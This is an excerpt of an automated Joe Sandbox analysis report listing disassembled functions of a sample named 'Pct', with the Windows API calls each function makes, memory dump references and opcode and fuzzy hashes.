                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                                  • Opcode ID: 1af3210b5c090401f01717ff6bded0392915bc8b42b32d7a33bb2ab489b3f4e8
                                                                                                                                                  • Instruction ID: 686222b715d70fb696e1ac47bc5156a525196802532dde02ccd759ebddba1950
                                                                                                                                                  • Opcode Fuzzy Hash: 1af3210b5c090401f01717ff6bded0392915bc8b42b32d7a33bb2ab489b3f4e8
                                                                                                                                                  • Instruction Fuzzy Hash: 37418266C2066875CB11EBB5CC4A9CFB3FDAF08310F518896F919E3121E734A719C7A5
                                                                                                                                                  Function 00C23B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C24BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23B8A,?), ref: 00C24BE0
                                                                                                                                                    • Part of subcall function 00C24BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23B8A,?), ref: 00C24BF9
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C23BAA
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C23BC6
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00C23BDE
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C23C26
                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00C23C92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                  • String ID: \*.*
                                                                                                                                                  • API String ID: 1377345388-1173974218
                                                                                                                                                  • Opcode ID: 1a8a78f52ac3643a953bbd2e90af6e0430a19ffa574452426561a011b5c0c39d
                                                                                                                                                  • Instruction ID: c63f950610ecb026b86c15dec24957ba78ee0d70cc08f1509b794fd832375a95
                                                                                                                                                  • Opcode Fuzzy Hash: 1a8a78f52ac3643a953bbd2e90af6e0430a19ffa574452426561a011b5c0c39d
                                                                                                                                                  • Instruction Fuzzy Hash: 7E416E71508394AAC756EF64D445ADFB7ECAF88340F50096EF49AC3191EB34D788C752
                                                                                                                                                  Function 00C478B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C478CF
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47976
                                                                                                                                                  • IsMenu.USER32(?), ref: 00C4798E
                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C479D6
                                                                                                                                                  • DrawMenuBar.USER32 ref: 00C479E9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                                  • Opcode ID: bb8a1cb1c1724b604c95528442dc8843d09306126b2be292035ce8bf5a33f240
                                                                                                                                                  • Instruction ID: d67d6b413ae76f11e0a1c1cd147517bd0c225563f72f0ef309feea4ccdc5a8c9
                                                                                                                                                  • Opcode Fuzzy Hash: bb8a1cb1c1724b604c95528442dc8843d09306126b2be292035ce8bf5a33f240
                                                                                                                                                  • Instruction Fuzzy Hash: 5F413875A04249EFDB20DF54D884F9EBBF9FB15310F148269E965A7250D730AE50CFA0
                                                                                                                                                  Function 00C41602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C41631
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C4165B
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C41712
                                                                                                                                                    • Part of subcall function 00C41602: RegCloseKey.ADVAPI32(?), ref: 00C41678
                                                                                                                                                    • Part of subcall function 00C41602: FreeLibrary.KERNEL32(?), ref: 00C416CA
                                                                                                                                                    • Part of subcall function 00C41602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C416ED
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C416B5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                                  • Opcode ID: a4585c19f13f2abd05e33385f0b67211dc80709d2db374eb78cc86de57aca240
                                                                                                                                                  • Instruction ID: aa58094c3d01a8dd71e2d488beb35e533dfcebd17022efe2bbe9d2447ddb5b58
                                                                                                                                                  • Opcode Fuzzy Hash: a4585c19f13f2abd05e33385f0b67211dc80709d2db374eb78cc86de57aca240
                                                                                                                                                  • Instruction Fuzzy Hash: 32311BB5900209BFDB149B90DC85BFFBBBCEB08311F140169E952E2151EA749F859AA0
                                                                                                                                                  Function 00C468F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000,?,?,?,00C4A461,?,?,?,?,?), ref: 00C46911
                                                                                                                                                  • GetWindowLongW.USER32(016F4BF0,000000F0,?,?,?,00C4A461,?,?,?,?,?), ref: 00C46944
                                                                                                                                                  • GetWindowLongW.USER32(016F4BF0,000000F0,00000000,?,?,?,00C4A461,?,?,?,?,?), ref: 00C46979
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000,00000000,?,?,?,00C4A461,?,?,?,?,?), ref: 00C469AB
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000,?,?,?,00C4A461,?,?,?,?), ref: 00C469D5
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0,?,?,?,00C4A461,?,?,?,?), ref: 00C469E6
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00C4A461,?,?,?,?), ref: 00C46A00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                  • Opcode ID: d21719f8c6f9c644c06f5db02750cd5e6a0902269a41a44b3dad653dadf177e3
                                                                                                                                                  • Instruction ID: 88120fbbb40da52bba527fa384abbd03cdc11c50aa575790f321526984b75d5a
                                                                                                                                                  • Opcode Fuzzy Hash: d21719f8c6f9c644c06f5db02750cd5e6a0902269a41a44b3dad653dadf177e3
                                                                                                                                                  • Instruction Fuzzy Hash: BE3138356042509FDB20CF18DC88F6837E1FB5A721F2801A8F914DB2B6CBB1AD40DB42
                                                                                                                                                  Function 00C1E287 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E2CA
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E2F0
                                                                                                                                                  • #2.OLEAUT32(00000000), ref: 00C1E2F3
                                                                                                                                                  • #2.OLEAUT32(?), ref: 00C1E311
                                                                                                                                                  • #6.OLEAUT32(?), ref: 00C1E31A
                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1E33F
                                                                                                                                                  • #2.OLEAUT32(?), ref: 00C1E34D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$FromString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1211328463-0
                                                                                                                                                  • Opcode ID: 180db363341505dd3c31082005a1242271bd7df1bbed976a9ffe6824950bc945
                                                                                                                                                  • Instruction ID: d73849b3b3a59c203dc1991cbb2a96ed82ce35e251263d68824dd28022a11e0b
                                                                                                                                                  • Opcode Fuzzy Hash: 180db363341505dd3c31082005a1242271bd7df1bbed976a9ffe6824950bc945
                                                                                                                                                  • Instruction Fuzzy Hash: C8217476604219AF9B109FA8DC88DFF77ACEF09361B544125FE24DB2A0D670ED819760
                                                                                                                                                  Function 00C3685E Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C38475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C384A0
                                                                                                                                                  • #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C368B1
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C368C0
                                                                                                                                                  • #12.WSOCK32(00000000,8004667E,00000000), ref: 00C368F9
                                                                                                                                                  • #4.WSOCK32(00000000,?,00000010), ref: 00C36902
                                                                                                                                                  • #111.WSOCK32 ref: 00C3690C
                                                                                                                                                  • #3.WSOCK32(00000000), ref: 00C36935
                                                                                                                                                  • #12.WSOCK32(00000000,8004667E,00000000), ref: 00C3694E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #111
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 568940515-0
                                                                                                                                                  • Opcode ID: c4dd42d76c7d7b6d5c48b5f2df1a4fd091a87fc7e0c3423ac56796b1c89f20a2
                                                                                                                                                  • Instruction ID: ce7b66e003bf2b924c0e3ef62b89849de4373654f0e50110c4c99c019fe77c89
                                                                                                                                                  • Opcode Fuzzy Hash: c4dd42d76c7d7b6d5c48b5f2df1a4fd091a87fc7e0c3423ac56796b1c89f20a2
                                                                                                                                                  • Instruction Fuzzy Hash: EA31A171610208ABDB10AF64CC85FBE77B9EB48721F148069FD16EB2D1DB74AD448BA1
                                                                                                                                                  Function 00C1E360 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E3A5
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1E3CB
                                                                                                                                                  • #2.OLEAUT32(00000000), ref: 00C1E3CE
                                                                                                                                                  • #2.OLEAUT32 ref: 00C1E3EF
                                                                                                                                                  • #6.OLEAUT32 ref: 00C1E3F8
                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1E412
                                                                                                                                                  • #2.OLEAUT32(?), ref: 00C1E420
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$FromString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1211328463-0
                                                                                                                                                  • Opcode ID: 3678fcfdc6508f7dbaa668d56d680db30d82ed06b826a401d7a0fde5a9f66c5f
                                                                                                                                                  • Instruction ID: 08b30f0ecf37a9ed00236678f0055dbc6b7ae4e8bc81a37ce47793b9087bfbff
                                                                                                                                                  • Opcode Fuzzy Hash: 3678fcfdc6508f7dbaa668d56d680db30d82ed06b826a401d7a0fde5a9f66c5f
                                                                                                                                                  • Instruction Fuzzy Hash: 1821B835604205AFAB109FA8DC88DEFB7ECEB093617508125FD14DB2A0D770EDC19B60
                                                                                                                                                  Function 00C47BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00BC2004), ref: 00BC214F
                                                                                                                                                    • Part of subcall function 00BC2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096,?), ref: 00BC2163
                                                                                                                                                    • Part of subcall function 00BC2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096), ref: 00BC216D
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00C47C57
                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00C47C64
                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00C47C6F
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00C47C7E
                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00C47C8A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                  • Opcode ID: 4aea9d52529ff769488e76b029414b8ef0b8b90b18fcf2a028c8fac14dc6f2bb
                                                                                                                                                  • Instruction ID: 2afabb8e08efa4414db8fac8386f5b2010915d1cd79d6c1c7c2fba52702b9627
                                                                                                                                                  • Opcode Fuzzy Hash: 4aea9d52529ff769488e76b029414b8ef0b8b90b18fcf2a028c8fac14dc6f2bb
                                                                                                                                                  • Instruction Fuzzy Hash: 331182B2150219BEEF159F64CCC5EEB7F6DFF08798F114215BA08A6090CB729C21DBA4
                                                                                                                                                  Function 00BE41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00BE4282,?), ref: 00BE41D3
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00BE41DA
                                                                                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00BE41E6
                                                                                                                                                  • DecodePointer.KERNEL32(00000001,00BE4282,?), ref: 00BE4203
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                                  • API String ID: 3489934621-340411864
                                                                                                                                                  • Opcode ID: 94303549e68a0fa26ffffb37770247adf98e72288cc8642ba1688c30b95a07bc
                                                                                                                                                  • Instruction ID: d345ed86622c5ef7d9035c150671d8ff639624f749510674b9c4f726ead4eaf6
                                                                                                                                                  • Opcode Fuzzy Hash: 94303549e68a0fa26ffffb37770247adf98e72288cc8642ba1688c30b95a07bc
                                                                                                                                                  • Instruction Fuzzy Hash: AFE012786A0781AFEF101B71ED4DB4C3AA4EB10B47F604428B802E50B0CBF544C88F08
                                                                                                                                                  Function 00BE428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BE41A8), ref: 00BE42A8
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00BE42AF
                                                                                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00BE42BA
                                                                                                                                                  • DecodePointer.KERNEL32(00BE41A8), ref: 00BE42D5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                                  • API String ID: 3489934621-2819208100
                                                                                                                                                  • Opcode ID: 3915d068fd00cd674c2d0f38d2d70f7eab05858782d19d0b84335577c4fefed4
                                                                                                                                                  • Instruction ID: c91981637df52fe6a62bc99b77bf100d91d411fec1b6aa7e772d4eea5b69656f
                                                                                                                                                  • Opcode Fuzzy Hash: 3915d068fd00cd674c2d0f38d2d70f7eab05858782d19d0b84335577c4fefed4
                                                                                                                                                  • Instruction Fuzzy Hash: 18E0BD786A0B40ABEB119F60AD4DB4D3AB4BB10B43F600128F901E50B0CBF44688CB18
                                                                                                                                                  Function 00BC218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00BC21B8
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00BC21F9
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00BC2221
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00BC2350
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00BC2369
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                  • Opcode ID: 0117d9943389c1013a4b5943864793e149e8dcb55cabe8f66a1acee8681e7ff9
                                                                                                                                                  • Instruction ID: 7cf8995e15956c102c0771f450145dbe2ca407a6a79833d003dd96f6206d75d6
                                                                                                                                                  • Opcode Fuzzy Hash: 0117d9943389c1013a4b5943864793e149e8dcb55cabe8f66a1acee8681e7ff9
                                                                                                                                                  • Instruction Fuzzy Hash: 2FB13839A00249DBDB10CFA8C980BEDB7F1FF48310F1485A9ED59EB254DB34AA54CB64
                                                                                                                                                  Function 00C26A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
